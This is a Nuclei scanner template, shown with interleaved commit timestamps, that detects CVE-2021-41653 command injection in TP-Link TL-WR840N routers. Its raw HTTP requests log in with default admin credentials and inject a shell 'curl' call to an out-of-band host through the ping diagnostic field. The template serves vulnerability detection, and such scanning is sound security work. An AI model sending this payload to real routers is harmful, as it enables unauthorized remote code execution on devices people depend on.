nuclei-templates/http/cves/2021/CVE-2021-41653.yaml

66 lines
2.2 KiB
YAML
Raw Normal View History

id: CVE-2021-41653
info:
name: TP-Link - OS Command Injection
author: gy741
severity: critical
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
2023-09-06 12:09:01 +00:00
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
reference:
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
- https://www.tp-link.com/us/press/security-advisory/
- http://tp-link.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-41653
cwe-id: CWE-94
2023-10-14 11:27:55 +00:00
epss-score: 0.95374
epss-percentile: 0.99139
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: tp-link
product: tl-wr840n_firmware
tags: cve,cve2021,tplink,rce,router
2023-03-29 11:07:38 +00:00
variables:
2023-03-29 14:11:27 +00:00
useragent: '{{rand_base(6)}}'
2023-03-29 11:07:38 +00:00
http:
- raw:
- |
POST /cgi?2 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
Referer: http://{{Hostname}}/mainFrame.htm
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=4
2023-03-29 13:54:19 +00:00
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
2021-11-30 16:52:16 +00:00
- |
POST /cgi?7 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
Referer: http://{{Hostname}}/mainFrame.htm
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
2023-03-29 10:03:28 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
2023-03-29 10:03:28 +00:00
- type: word
part: interactsh_request
words:
2023-03-29 13:54:19 +00:00
- "User-Agent: {{useragent}}"
# digest: 490a00463044022002db7815e54b3e2f5e8324892c90e0617d90787d7a8fd8c8cf7c33ae088c9289022039a30ec2ad1ed3fa721f9524b19e545ebff475908a1462b9bf3cca7fcb935012:922c64590222798bb761d5b6d8e72950